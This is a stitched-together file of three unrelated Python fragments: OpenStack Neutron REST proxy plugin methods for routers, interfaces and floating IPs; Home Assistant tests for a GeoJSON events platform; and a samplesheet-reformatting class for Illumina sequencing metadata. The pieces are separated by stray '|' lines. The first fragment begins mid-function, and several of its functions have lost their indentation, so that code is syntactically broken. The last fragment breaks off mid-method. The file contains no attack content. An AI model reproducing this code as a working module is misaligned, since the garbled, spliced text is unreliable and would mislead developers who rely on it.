if parsedrule['nexthops'][0] == '':
parsedrule['nexthops'] = []
if tenantid == '*':
defaultset.append(parsedrule)
if tenantid == tenant:
tenantset.append(parsedrule)
if tenantset:
return tenantset
return defaultset
    def create_router(self, context, router):
        """Create a router in the DB and mirror it to the backend.

        :param context: neutron api request context
        :param router: router request dict ({'router': {...}})
        :returns: the router dict created by the parent plugin
        :raises: RemoteRestError if the backend create fails (the DB
            router is deleted again before re-raising)
        """
        LOG.debug(_("NeutronRestProxyV2: create_router() called"))
        self._warn_on_state_status(router['router'])
        tenant_id = self._get_tenant_id_for_create(context, router["router"])
        # set default router rules
        rules = self._get_tenant_default_router_rules(tenant_id)
        router['router']['router_rules'] = rules
        # create router in DB
        new_router = super(NeutronRestProxyV2, self).create_router(context,
                                                                   router)
        # create router on the network controller
        try:
            resource = ROUTER_RESOURCE_PATH % tenant_id
            mapped_router = self._map_state_and_status(new_router)
            data = {
                "router": mapped_router
            }
            ret = self.servers.post(resource, data)
            if not self.servers.action_success(ret):
                raise RemoteRestError(ret[2])
        except RemoteRestError as e:
            LOG.error(_("NeutronRestProxyV2: Unable to create remote router: "
                        "%s"), e.message)
            # rollback: remove the DB router created above
            super(NeutronRestProxyV2, self).delete_router(context,
                                                          new_router['id'])
            raise
        # return created router
        return new_router
    def update_router(self, context, router_id, router):
        """Update a router in the DB and mirror the change to the backend.

        :param context: neutron api request context
        :param router_id: UUID of the router being updated
        :param router: router request dict with the fields to change
        :returns: the updated router dict
        :raises: RemoteRestError if the backend update fails (the DB
            router is reset to its previous state first)
        """
        LOG.debug(_("NeutronRestProxyV2.update_router() called"))
        self._warn_on_state_status(router['router'])
        # snapshot taken before the change, used for the rollback below
        orig_router = super(NeutronRestProxyV2, self).get_router(context,
                                                                 router_id)
        tenant_id = orig_router["tenant_id"]
        new_router = super(NeutronRestProxyV2, self).update_router(context,
                                                                   router_id,
                                                                   router)
        # update router on network controller
        try:
            resource = ROUTERS_PATH % (tenant_id, router_id)
            mapped_router = self._map_state_and_status(new_router)
            data = {
                "router": mapped_router
            }
            ret = self.servers.put(resource, data)
            if not self.servers.action_success(ret):
                raise RemoteRestError(ret[2])
        except RemoteRestError as e:
            LOG.error(_("NeutronRestProxyV2: Unable to update remote router: "
                        "%s"), e.message)
            # reset router to original state
            # NOTE(review): orig_router is a plain router dict, while
            # update_router expects a {'router': ...} request dict --
            # confirm this rollback path actually works.
            super(NeutronRestProxyV2, self).update_router(context,
                                                          router_id,
                                                          orig_router)
            raise
        # return updated router
        return new_router
    def delete_router(self, context, router_id):
        """Delete a router after verifying it is unused.

        :param context: neutron api request context
        :param router_id: UUID of the router to delete
        :raises: l3.RouterInUse if floating IPs or interface ports
            still reference the router
        :raises: RemoteRestError if the backend delete fails
        """
        LOG.debug(_("NeutronRestProxyV2: delete_router() called"))
        with context.session.begin(subtransactions=True):
            orig_router = self._get_router(context, router_id)
            tenant_id = orig_router["tenant_id"]
            # Ensure that the router is not used
            router_filter = {'router_id': [router_id]}
            fips = self.get_floatingips_count(context.elevated(),
                                              filters=router_filter)
            if fips:
                raise l3.RouterInUse(router_id=router_id)
            device_owner = l3_db.DEVICE_OWNER_ROUTER_INTF
            device_filter = {'device_id': [router_id],
                             'device_owner': [device_owner]}
            ports = self.get_ports_count(context.elevated(),
                                         filters=device_filter)
            if ports:
                raise l3.RouterInUse(router_id=router_id)
        # delete from network ctrl. Remote error on delete is ignored
        # NOTE(review): despite the comment above, a RemoteRestError is
        # logged and then re-raised here, so the error is NOT ignored.
        try:
            resource = ROUTERS_PATH % (tenant_id, router_id)
            ret = self.servers.delete(resource)
            if not self.servers.action_success(ret):
                raise RemoteRestError(ret[2])
            ret_val = super(NeutronRestProxyV2, self).delete_router(context,
                                                                    router_id)
            return ret_val
        except RemoteRestError as e:
            LOG.error(_("NeutronRestProxyV2: Unable to delete remote router: "
                        "%s"), e.message)
            raise
    def add_router_interface(self, context, router_id, interface_info):
        """Attach a subnet/port interface to a router.

        :param context: neutron api request context
        :param router_id: UUID of the router
        :param interface_info: dict carrying 'port_id' or 'subnet_id'
        :returns: the interface info dict from the parent plugin
        :raises: RemoteRestError if the backend create fails (the DB
            interface is removed again before re-raising)
        """
        LOG.debug(_("NeutronRestProxyV2: add_router_interface() called"))
        # Validate args
        router = self._get_router(context, router_id)
        tenant_id = router['tenant_id']
        # create interface in DB
        new_interface_info = super(NeutronRestProxyV2,
                                   self).add_router_interface(context,
                                                              router_id,
                                                              interface_info)
        port = self._get_port(context, new_interface_info['port_id'])
        net_id = port['network_id']
        subnet_id = new_interface_info['subnet_id']
        # we will use the port's network id as interface's id
        interface_id = net_id
        intf_details = self._get_router_intf_details(context,
                                                     interface_id,
                                                     subnet_id)
        # create interface on the network controller
        try:
            resource = ROUTER_INTF_OP_PATH % (tenant_id, router_id)
            data = {"interface": intf_details}
            ret = self.servers.post(resource, data)
            if not self.servers.action_success(ret):
                raise RemoteRestError(ret[2])
        except RemoteRestError as e:
            LOG.error(_("NeutronRestProxyV2: Unable to create interface: "
                        "%s"), e.message)
            # rollback: detach the DB interface added above
            super(NeutronRestProxyV2,
                  self).remove_router_interface(context, router_id,
                                                interface_info)
            raise
        return new_interface_info
    def remove_router_interface(self, context, router_id, interface_info):
        """Detach a subnet/port interface from a router.

        :param context: neutron api request context
        :param router_id: UUID of the router
        :param interface_info: dict carrying 'port_id' or 'subnet_id'
        :returns: the removed interface info from the parent plugin
        :raises: exceptions.BadRequest when neither port_id nor
            subnet_id is supplied
        :raises: RemoteRestError if the backend delete fails
        """
        LOG.debug(_("NeutronRestProxyV2: remove_router_interface() called"))
        # Validate args
        router = self._get_router(context, router_id)
        tenant_id = router['tenant_id']
        # we will first get the interface identifier before deleting in the DB
        if not interface_info:
            msg = "Either subnet_id or port_id must be specified"
            raise exceptions.BadRequest(resource='router', msg=msg)
        if 'port_id' in interface_info:
            port = self._get_port(context, interface_info['port_id'])
            interface_id = port['network_id']
        elif 'subnet_id' in interface_info:
            subnet = self._get_subnet(context, interface_info['subnet_id'])
            interface_id = subnet['network_id']
        else:
            # same validation as the empty-dict guard above, repeated
            # for dicts that contain neither recognized key
            msg = "Either subnet_id or port_id must be specified"
            raise exceptions.BadRequest(resource='router', msg=msg)
        # remove router interface in DB
        del_intf_info = super(NeutronRestProxyV2,
                              self).remove_router_interface(context,
                                                            router_id,
                                                            interface_info)
        # delete the interface on the network controller
        try:
            resource = ROUTER_INTF_PATH % (tenant_id, router_id, interface_id)
            ret = self.servers.delete(resource)
            if not self.servers.action_success(ret):
                raise RemoteRestError(ret[2])
        except RemoteRestError as e:
            LOG.error(_("NeutronRestProxyV2:Unable to delete remote intf: "
                        "%s"), e.message)
            raise
        # return the removed interface info
        return del_intf_info
def create_floatingip(self, context, floatingip):
LOG.debug(_("NeutronRestProxyV2: create_floatingip() called"))
# create floatingip in DB
new_fl_ip = super(NeutronRestProxyV2,
self).create_floatingip(context, floatingip)
net_id = new_fl_ip['floating_network_id']
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
# create floatingip on the network controller
try:
self._send_update_network(orig_net)
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to create remote "
"floatin IP: %s"), e.message)
super(NeutronRestProxyV2, self).delete_floatingip(context,
floatingip)
raise
# return created floating IP
return new_fl_ip
    def update_floatingip(self, context, id, floatingip):
        """Update a floating IP and resync its network to the backend.

        :param context: neutron api request context
        :param id: UUID of the floating IP
        :param floatingip: floating IP request dict with fields to change
        :returns: the updated floating IP dict
        :raises: RemoteRestError if the backend update fails (a DB
            rollback is attempted first)
        """
        LOG.debug(_("NeutronRestProxyV2: update_floatingip() called"))
        # snapshot taken before the change, used for the rollback below
        orig_fl_ip = super(NeutronRestProxyV2, self).get_floatingip(context,
                                                                    id)
        # update floatingip in DB
        new_fl_ip = super(NeutronRestProxyV2,
                          self).update_floatingip(context, id, floatingip)
        net_id = new_fl_ip['floating_network_id']
        orig_net = super(NeutronRestProxyV2, self).get_network(context,
                                                               net_id)
        # update network on network controller
        try:
            self._send_update_network(orig_net)
        except RemoteRestError:
            # rollback updation of subnet
            # NOTE(review): orig_fl_ip is a plain floating IP dict, while
            # update_floatingip expects {'floatingip': ...} -- confirm
            # that this rollback call actually works.
            super(NeutronRestProxyV2, self).update_floatingip(context, id,
                                                              orig_fl_ip)
            raise
        return new_fl_ip
    def delete_floatingip(self, context, id):
        """Delete a floating IP and resync its network to the backend.

        :param context: neutron api request context
        :param id: UUID of the floating IP to delete
        :raises: RemoteRestError if the backend resync fails (the DB
            deletion is NOT rolled back -- see TODO below)
        """
        LOG.debug(_("NeutronRestProxyV2: delete_floatingip() called"))
        # the network id must be read before the floating IP disappears
        orig_fl_ip = super(NeutronRestProxyV2, self).get_floatingip(context,
                                                                    id)
        # delete floating IP in DB
        net_id = orig_fl_ip['floating_network_id']
        super(NeutronRestProxyV2, self).delete_floatingip(context, id)
        orig_net = super(NeutronRestProxyV2, self).get_network(context,
                                                               net_id)
        # update network on network controller
        try:
            self._send_update_network(orig_net)
        except RemoteRestError:
            # TODO(Sumit): rollback deletion of floating IP
            raise
    def _send_all_data(self):
        """Push all data to the network controller.

        Serializes every network (with subnets, floating IPs and ports,
        each port annotated with its attachment) and every router (with
        its interfaces) and PUTs the whole topology in one request, so
        the controller can re-sync its persistent store with neutron's
        current view of that data.

        :returns: the backend response tuple on success
        :raises: RemoteRestError if the topology update fails
        """
        admin_context = qcontext.get_admin_context()
        networks = []
        routers = []
        all_networks = super(NeutronRestProxyV2,
                             self).get_networks(admin_context) or []
        for net in all_networks:
            mapped_network = self._get_mapped_network_with_subnets(net)
            net_fl_ips = self._get_network_with_floatingips(mapped_network)
            ports = []
            net_filter = {'network_id': [net.get('id')]}
            net_ports = super(NeutronRestProxyV2,
                              self).get_ports(admin_context,
                                              filters=net_filter) or []
            for port in net_ports:
                mapped_port = self._map_state_and_status(port)
                # the backend expects the device/mac pair as 'attachment'
                mapped_port['attachment'] = {
                    'id': port.get('device_id'),
                    'mac': port.get('mac_address'),
                }
                ports.append(mapped_port)
            net_fl_ips['ports'] = ports
            networks.append(net_fl_ips)
        all_routers = super(NeutronRestProxyV2,
                            self).get_routers(admin_context) or []
        for router in all_routers:
            interfaces = []
            mapped_router = self._map_state_and_status(router)
            router_filter = {
                'device_owner': ["network:router_interface"],
                'device_id': [router.get('id')]
            }
            router_ports = super(NeutronRestProxyV2,
                                 self).get_ports(admin_context,
                                                 filters=router_filter) or []
            for port in router_ports:
                net_id = port.get('network_id')
                # only the first fixed IP's subnet is reported per port
                subnet_id = port['fixed_ips'][0]['subnet_id']
                intf_details = self._get_router_intf_details(admin_context,
                                                             net_id,
                                                             subnet_id)
                interfaces.append(intf_details)
            mapped_router['interfaces'] = interfaces
            routers.append(mapped_router)
        try:
            resource = '/topology'
            data = {
                'networks': networks,
                'routers': routers,
            }
            ret = self.servers.put(resource, data)
            if not self.servers.action_success(ret):
                raise RemoteRestError(ret[2])
            return ret
        except RemoteRestError as e:
            LOG.error(_('NeutronRestProxy: Unable to update remote '
                        'topology: %s'), e.message)
            raise
def _add_host_route(self, context, destination, port):
subnet = {}
for fixed_ip in port['fixed_ips']:
subnet_id = fixed_ip['subnet_id']
nexthop = fixed_ip['ip_address']
subnet['host_routes'] = [{'destination': destination,
'nexthop': nexthop}]
updated_subnet = self.update_subnet(context,
subnet_id,
{'subnet': subnet})
payload = {'subnet': updated_subnet}
self._dhcp_agent_notifier.notify(context, payload,
'subnet.update.end')
LOG.debug("Adding host route: ")
LOG.debug("destination:%s nexthop:%s" % (destination,
nexthop))
def _get_network_with_floatingips(self, network):
admin_context = qcontext.get_admin_context()
net_id = network['id']
net_filter = {'floating_network_id': [net_id]}
fl_ips = super(NeutronRestProxyV2,
self).get_floatingips(admin_context,
filters=net_filter) or []
network['floatingips'] = fl_ips
return network
def _get_all_subnets_json_for_network(self, net_id):
admin_context = qcontext.get_admin_context()
subnets = self._get_subnets_by_network(admin_context,
net_id)
subnets_details = []
if subnets:
for subnet in subnets:
subnet_dict = self._make_subnet_dict(subnet)
mapped_subnet = self._map_state_and_status(subnet_dict)
subnets_details.append(mapped_subnet)
return subnets_details
def _get_mapped_network_with_subnets(self, network):
admin_context = qcontext.get_admin_context()
network = self._map_state_and_status(network)
subnets = self._get_all_subnets_json_for_network(network['id'])
network['subnets'] = subnets
for subnet in (subnets or []):
if subnet['gateway_ip']:
# FIX: For backward compatibility with wire protocol
network['gateway'] = subnet['gateway_ip']
break
else:
network['gateway'] = ''
network[l3.EXTERNAL] = self._network_is_external(admin_context,
network['id'])
return network
def _send_update_network(self, network):
net_id = network['id']
tenant_id = network['tenant_id']
# update network on network controller
try:
resource = NETWORKS_PATH % (tenant_id, net_id)
mapped_network = self._get_mapped_network_with_subnets(network)
net_fl_ips = self._get_network_with_floatingips(mapped_network)
data = {
"network": net_fl_ips,
}
ret = self.servers.put(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote "
"network: %s"), e.message)
raise
def _map_state_and_status(self, resource):
resource = copy.copy(resource)
resource['state'] = ('UP' if resource.pop('admin_state_up',
True) else 'DOWN')
if 'status' in resource:
del resource['status']
return resource
def _warn_on_state_status(self, resource):
if resource.get('admin_state_up', True) is False:
LOG.warning(_("Setting admin_state_up=False is not supported"
" in this plugin version. Ignoring setting for "
"resource: %s"), resource)
if 'status' in resource:
if resource['status'] is not const.NET_STATUS_ACTIVE:
LOG.warning(_("Operational status is internally set by the"
" plugin. Ignoring setting status=%s."),
resource['status'])
def _get_router_intf_details(self, context, intf_id, subnet_id):
# we will use the network id as interface's id
net_id = intf_id
network = super(NeutronRestProxyV2, self).get_network(context,
net_id)
subnet = super(NeutronRestProxyV2, self).get_subnet(context,
subnet_id)
mapped_network = self._get_mapped_network_with_subnets(network)
mapped_subnet = self._map_state_and_status(subnet)
data = {
'id': intf_id,
"network": mapped_network,
"subnet": mapped_subnet
}
return data
def _extend_port_dict_binding(self, context, port):
cfg_vif_type = cfg.CONF.NOVA.vif_type.lower()
if not cfg_vif_type in (portbindings.VIF_TYPE_OVS,
portbindings.VIF_TYPE_IVS):
LOG.warning(_("Unrecognized vif_type in configuration "
"[%s]. Defaulting to ovs. "),
cfg_vif_type)
cfg_vif_type = portbindings.VIF_TYPE_OVS
hostid = porttracker_db.get_port_hostid(context,
port.get("device_id"))
if hostid:
override = self._check_hostvif_override(hostid)
if override:
cfg_vif_type = override
port[portbindings.VIF_TYPE] = cfg_vif_type
port[portbindings.CAPABILITIES] = {
portbindings.CAP_PORT_FILTER:
'security-group' in self.supported_extension_aliases}
return port
def _check_hostvif_override(self, hostid):
for v in cfg.CONF.NOVA.vif_types:
if hostid in getattr(cfg.CONF.NOVA, "node_override_vif_" + v, []):
return v
return False
|
|
"""The tests for the geojson platform."""
from asynctest.mock import patch, MagicMock, call
from homeassistant.components import geo_location
from homeassistant.components.geo_location import ATTR_SOURCE
from homeassistant.components.geo_json_events.geo_location import \
SCAN_INTERVAL, ATTR_EXTERNAL_ID, SIGNAL_DELETE_ENTITY, SIGNAL_UPDATE_ENTITY
from homeassistant.const import CONF_URL, EVENT_HOMEASSISTANT_START, \
CONF_RADIUS, ATTR_LATITUDE, ATTR_LONGITUDE, ATTR_FRIENDLY_NAME, \
ATTR_UNIT_OF_MEASUREMENT, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant.helpers.dispatcher import DATA_DISPATCHER
from homeassistant.setup import async_setup_component
from tests.common import assert_setup_component, async_fire_time_changed
import homeassistant.util.dt as dt_util
# Feed URL used by all test configurations below.
URL = 'http://geo.json.local/geo_json_events.json'

# Minimal platform configuration relying on the default home location.
CONFIG = {
    geo_location.DOMAIN: [
        {
            'platform': 'geo_json_events',
            CONF_URL: URL,
            CONF_RADIUS: 200
        }
    ]
}

# Same configuration but with an explicit latitude/longitude, used to
# verify the feed is created with the custom coordinates instead of the
# hass home location.
CONFIG_WITH_CUSTOM_LOCATION = {
    geo_location.DOMAIN: [
        {
            'platform': 'geo_json_events',
            CONF_URL: URL,
            CONF_RADIUS: 200,
            CONF_LATITUDE: 15.1,
            CONF_LONGITUDE: 25.2
        }
    ]
}
def _generate_mock_feed_entry(external_id, title, distance_to_home,
coordinates):
"""Construct a mock feed entry for testing purposes."""
feed_entry = MagicMock()
feed_entry.external_id = external_id
feed_entry.title = title
feed_entry.distance_to_home = distance_to_home
feed_entry.coordinates = coordinates
return feed_entry
async def test_setup(hass):
    """Test the general setup of the platform.

    Drives the feed manager through its lifecycle: initial population,
    an update that replaces one entry, a successful-but-empty update
    (entities kept), and an error update (entities removed).
    """
    # Set up some mock feed entries for this test.
    mock_entry_1 = _generate_mock_feed_entry(
        '1234', 'Title 1', 15.5, (-31.0, 150.0))
    mock_entry_2 = _generate_mock_feed_entry(
        '2345', 'Title 2', 20.5, (-31.1, 150.1))
    mock_entry_3 = _generate_mock_feed_entry(
        '3456', 'Title 3', 25.5, (-31.2, 150.2))
    mock_entry_4 = _generate_mock_feed_entry(
        '4567', 'Title 4', 12.5, (-31.3, 150.3))
    # Patching 'utcnow' to gain more control over the timed update.
    utcnow = dt_util.utcnow()
    with patch('homeassistant.util.dt.utcnow', return_value=utcnow), \
            patch('geojson_client.generic_feed.GenericFeed') as mock_feed:
        mock_feed.return_value.update.return_value = 'OK', [mock_entry_1,
                                                            mock_entry_2,
                                                            mock_entry_3]
        with assert_setup_component(1, geo_location.DOMAIN):
            assert await async_setup_component(
                hass, geo_location.DOMAIN, CONFIG)
            # Artificially trigger update.
            hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
            # Collect events.
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 3
            # The entity state is the distance to home; the coordinates
            # and external id are exposed as attributes.
            state = hass.states.get("geo_location.title_1")
            assert state is not None
            assert state.name == "Title 1"
            assert state.attributes == {
                ATTR_EXTERNAL_ID: "1234", ATTR_LATITUDE: -31.0,
                ATTR_LONGITUDE: 150.0, ATTR_FRIENDLY_NAME: "Title 1",
                ATTR_UNIT_OF_MEASUREMENT: "km",
                ATTR_SOURCE: 'geo_json_events'}
            assert round(abs(float(state.state)-15.5), 7) == 0
            state = hass.states.get("geo_location.title_2")
            assert state is not None
            assert state.name == "Title 2"
            assert state.attributes == {
                ATTR_EXTERNAL_ID: "2345", ATTR_LATITUDE: -31.1,
                ATTR_LONGITUDE: 150.1, ATTR_FRIENDLY_NAME: "Title 2",
                ATTR_UNIT_OF_MEASUREMENT: "km",
                ATTR_SOURCE: 'geo_json_events'}
            assert round(abs(float(state.state)-20.5), 7) == 0
            state = hass.states.get("geo_location.title_3")
            assert state is not None
            assert state.name == "Title 3"
            assert state.attributes == {
                ATTR_EXTERNAL_ID: "3456", ATTR_LATITUDE: -31.2,
                ATTR_LONGITUDE: 150.2, ATTR_FRIENDLY_NAME: "Title 3",
                ATTR_UNIT_OF_MEASUREMENT: "km",
                ATTR_SOURCE: 'geo_json_events'}
            assert round(abs(float(state.state)-25.5), 7) == 0
            # Simulate an update - one existing, one new entry,
            # one outdated entry
            mock_feed.return_value.update.return_value = 'OK', [
                mock_entry_1, mock_entry_4, mock_entry_3]
            # Advancing time by SCAN_INTERVAL triggers the next feed poll.
            async_fire_time_changed(hass, utcnow + SCAN_INTERVAL)
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 3
            # Simulate an update - empty data, but successful update,
            # so no changes to entities.
            mock_feed.return_value.update.return_value = 'OK_NO_DATA', None
            async_fire_time_changed(hass, utcnow + 2 * SCAN_INTERVAL)
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 3
            # Simulate an update error - removes all entities
            mock_feed.return_value.update.return_value = 'ERROR', None
            async_fire_time_changed(hass, utcnow + 3 * SCAN_INTERVAL)
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 0
async def test_setup_with_custom_location(hass):
    """Test the setup with a custom location.

    Verifies the configured latitude/longitude (rather than the hass
    home coordinates) are handed to the GenericFeed constructor.
    """
    # Set up some mock feed entries for this test.
    mock_entry_1 = _generate_mock_feed_entry(
        '1234', 'Title 1', 2000.5, (-31.1, 150.1))
    with patch('geojson_client.generic_feed.GenericFeed') as mock_feed:
        mock_feed.return_value.update.return_value = 'OK', [mock_entry_1]
        with assert_setup_component(1, geo_location.DOMAIN):
            assert await async_setup_component(
                hass, geo_location.DOMAIN, CONFIG_WITH_CUSTOM_LOCATION)
            # Artificially trigger update.
            hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
            # Collect events.
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 1
            # The feed must be created with the custom coordinates from
            # the configuration, not the default home location.
            assert mock_feed.call_args == call(
                (15.1, 25.2), URL, filter_radius=200.0)
async def test_setup_race_condition(hass):
    """Test a particular race condition experienced.

    Regression test ensuring removed entities stop listening for
    dispatcher signals, so a re-created entity for the same external id
    does not leave a stale listener behind.
    """
    # 1. Feed returns 1 entry -> Feed manager creates 1 entity.
    # 2. Feed returns error -> Feed manager removes 1 entity.
    #    However, this stayed on and kept listening for dispatcher signals.
    # 3. Feed returns 1 entry -> Feed manager creates 1 entity.
    # 4. Feed returns 1 entry -> Feed manager updates 1 entity.
    #    Internally, the previous entity is updating itself, too.
    # 5. Feed returns error -> Feed manager removes 1 entity.
    #    There are now 2 entities trying to remove themselves from HA, but
    #    the second attempt fails of course.
    # Set up some mock feed entries for this test.
    mock_entry_1 = _generate_mock_feed_entry(
        '1234', 'Title 1', 15.5, (-31.0, 150.0))
    # Dispatcher signal names for the single entity's external id.
    delete_signal = SIGNAL_DELETE_ENTITY.format('1234')
    update_signal = SIGNAL_UPDATE_ENTITY.format('1234')
    # Patching 'utcnow' to gain more control over the timed update.
    utcnow = dt_util.utcnow()
    with patch('homeassistant.util.dt.utcnow', return_value=utcnow), \
            patch('geojson_client.generic_feed.GenericFeed') as mock_feed:
        with assert_setup_component(1, geo_location.DOMAIN):
            assert await async_setup_component(
                hass, geo_location.DOMAIN, CONFIG)
            mock_feed.return_value.update.return_value = 'OK', [mock_entry_1]
            # Artificially trigger update.
            hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
            # Collect events.
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 1
            # Exactly one listener per signal while the entity exists.
            assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 1
            assert len(hass.data[DATA_DISPATCHER][update_signal]) == 1
            # Simulate an update error - removes all entities
            mock_feed.return_value.update.return_value = 'ERROR', None
            async_fire_time_changed(hass, utcnow + SCAN_INTERVAL)
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 0
            # Removal must also unregister the dispatcher listeners.
            assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 0
            assert len(hass.data[DATA_DISPATCHER][update_signal]) == 0
            # Simulate an update - 1 entry
            mock_feed.return_value.update.return_value = 'OK', [mock_entry_1]
            async_fire_time_changed(hass, utcnow + 2 * SCAN_INTERVAL)
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 1
            assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 1
            assert len(hass.data[DATA_DISPATCHER][update_signal]) == 1
            # Simulate an update - 1 entry
            mock_feed.return_value.update.return_value = 'OK', [mock_entry_1]
            async_fire_time_changed(hass, utcnow + 3 * SCAN_INTERVAL)
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 1
            # Still exactly one listener per signal after the re-create.
            assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 1
            assert len(hass.data[DATA_DISPATCHER][update_signal]) == 1
            # Simulate an update error - removes all entities
            mock_feed.return_value.update.return_value = 'ERROR', None
            async_fire_time_changed(hass, utcnow + 4 * SCAN_INTERVAL)
            await hass.async_block_till_done()
            all_states = hass.states.async_all()
            assert len(all_states) == 0
            # Ensure that delete and update signal targets are now empty.
            assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 0
            assert len(hass.data[DATA_DISPATCHER][update_signal]) == 0
|
|
import re
import pandas as pd
from igf_data.illumina.samplesheet import SampleSheet
from igf_data.utils.sequtils import rev_comp
from igf_data.process.metadata_reformat.reformat_metadata_file import Reformat_metadata_file
# Columns retained when reformatting a samplesheet; anything else is dropped.
SAMPLESHEET_COLUMNS = [
  'Lane',
  'Sample_ID',
  'Sample_Name',
  'Sample_Plate',
  'Sample_Well',
  'I7_Index_ID',
  'index',
  'I5_Index_ID',
  'index2',
  'Sample_Project',
  'Description',
  'Pool_Number'
]

class Reformat_samplesheet_file:
  '''
  A class for reformatting samplesheet file

  :param infile: Input samplesheet file
  :param file_format: Input file format, default samplesheet
                      List of allowed formats
                        * samplesheet
                        * csv
  :param samplesheet_columns: A list of expected columns in the samplesheet file
                              A list of default columns
                                * Lane
                                * Sample_ID
                                * Sample_Name
                                * Sample_Plate
                                * Sample_Well
                                * I7_Index_ID
                                * index
                                * I5_Index_ID
                                * index2
                                * Sample_Project
                                * Description
                                * Pool_Number
  :param remove_adapters: A toggle for removing adapters from header section ,default False
  :param revcomp_index1: A toggle for reverse complementing index1 column, default False
  :param revcomp_index2: A toggle for reverse complementing index2 column, default False
  :param tenx_label: Description label for 10x experiments, default '10X'
  :param sample_id: Sample id column name, default 'Sample_ID'
  :param sample_name: Sample name column name, default 'Sample_Name'
  :param index: I7 index column name, default 'index'
  :param index2: I5 index column name, default 'index2'
  :param sample_project: Project name column name, default 'Sample_Project'
  :param description: Description column name, default 'Description'
  :param adapter_section: Adapter section name in header, default 'Settings'
  :param adapter_keys: A list of adapter keys to be removed from samplesheet header, default ('Adapter','AdapterRead2')
  '''
  def __init__(self,infile,
               file_format='samplesheet',
               samplesheet_columns=SAMPLESHEET_COLUMNS,
               remove_adapters=False,
               revcomp_index1=False,
               revcomp_index2=False,
               tenx_label='10X',
               sample_id='Sample_ID',
               sample_name='Sample_Name',
               index='index',
               index2='index2',
               sample_project='Sample_Project',
               description='Description',
               adapter_section='Settings',
               adapter_keys=('Adapter','AdapterRead2')):
    try:
      self.infile = infile
      # only the two supported formats are accepted
      if file_format not in ['samplesheet','csv']:
        raise ValueError('File format {0} not supported'.format(file_format))
      self.file_format = file_format
      self.samplesheet_columns = samplesheet_columns
      self.tenx_label = tenx_label
      self.remove_adapters = remove_adapters
      self.revcomp_index1 = revcomp_index1
      self.revcomp_index2 = revcomp_index2
      self.sample_id = sample_id
      self.sample_name = sample_name
      self.index = index
      self.index2 = index2
      self.sample_project = sample_project
      self.description = description
      self.adapter_section = adapter_section
      self.adapter_keys = adapter_keys
    except Exception as e:
      raise ValueError('Error in initializing samplesheet reformatting, error: {0}'.\
                       format(e))

  @staticmethod
  def detect_tenx_barcodes(index,tenx_label='10X'):
    '''
    A static method for checking 10X I7 index barcodes

    :param index: I7 index string
    :param tenx_label: A string description for 10X samples, default, '10X'
    :returns: A string, *tenx_label* when the index looks like a 10X
              barcode (e.g. SI-GA-A1), otherwise an empty string
    '''
    try:
      description = ''
      pattern = re.compile(r'SI-[GN]A-[A-H]\d+',re.IGNORECASE)
      if re.match(pattern,index):
        description = tenx_label
      return description
    except Exception as e:
      raise ValueError('Failed to detect Tenx single cell barcode for index {0}, error: {1}'.\
                       format(index,e))

  def correct_samplesheet_data_row(self,row):
    '''
    A method for correcting samplesheet data row

    :param row: A Pandas Series
    :returns: A Pandas Series
    '''
    try:
      if not isinstance(row,pd.Series):
        raise TypeError('Expecting A pandas series and got {0}'.\
                        format(type(row)))
      if self.sample_id in row.keys():
        row[self.sample_id] = \
          Reformat_metadata_file.\
          sample_and_project_reformat(row[self.sample_id]) # reformat sample id
      if self.sample_project in row.keys():
        row[self.sample_project] = \
          Reformat_metadata_file.\
          sample_and_project_reformat(row[self.sample_project]) # reformat project name
      if self.sample_name in row.keys():
        row[self.sample_name] = \
          Reformat_metadata_file.\
          sample_name_reformat(row[self.sample_name]) # reformat sample name
      if self.index in row.keys() and \
         self.description in row.keys():
        row[self.description] = \
          self.detect_tenx_barcodes(\
            index=row[self.index],
            tenx_label=self.tenx_label) # add description label for 10x samples
      # BUGFIX: the None/empty guards below previously used 'or', which
      # is always true and let None values reach .upper()
      if self.index in row.keys() and \
         self.description in row.keys() and \
         row[self.index] is not None and \
         row[self.index] != '' and \
         row[self.description] != self.tenx_label:
        row[self.index] = row[self.index].upper()
        if self.revcomp_index1:
          row[self.index] = rev_comp(row[self.index]) # revcomp index 1
      if self.index2 in row.keys() and \
         row[self.index2] is not None and \
         row[self.index2] != '':
        row[self.index2] = row[self.index2].upper()
        if self.revcomp_index2:
          row[self.index2] = rev_comp(row[self.index2]) # revcomp index 2
      if self.description in row.keys() and \
         row[self.description] is not None and \
         row[self.description] != '':
        row[self.description] = row[self.description].upper() # change description to upper case letters
      return row
    except Exception as e:
      raise ValueError('Failed to correct samplesheet data row {0},error {1}'.\
                       format(row,e))

  def reformat_raw_samplesheet_file(self,output_file):
    '''
    A method for reformatting raw samplesheet file

    :param output_file: An output file path
    :returns: None
    '''
    try:
      samplesheet_data = list()
      if self.file_format == 'samplesheet':
        samplesheet = SampleSheet(infile=self.infile)
        samplesheet_data = pd.DataFrame(samplesheet._data)
      elif self.file_format == 'csv':
        samplesheet_data = pd.read_csv(self.infile,header=0,dtype=object)
      samplesheet_data.fillna('',inplace=True)
      samplesheet_data = \
        samplesheet_data.\
          apply(\
            lambda row: self.correct_samplesheet_data_row(row=row),
            axis=1,
            result_type='reduce') # reformat samplesheet data
      column_names = \
        [column_name \
          for column_name in samplesheet_data.columns \
            if column_name in self.samplesheet_columns ] # filter expected column names
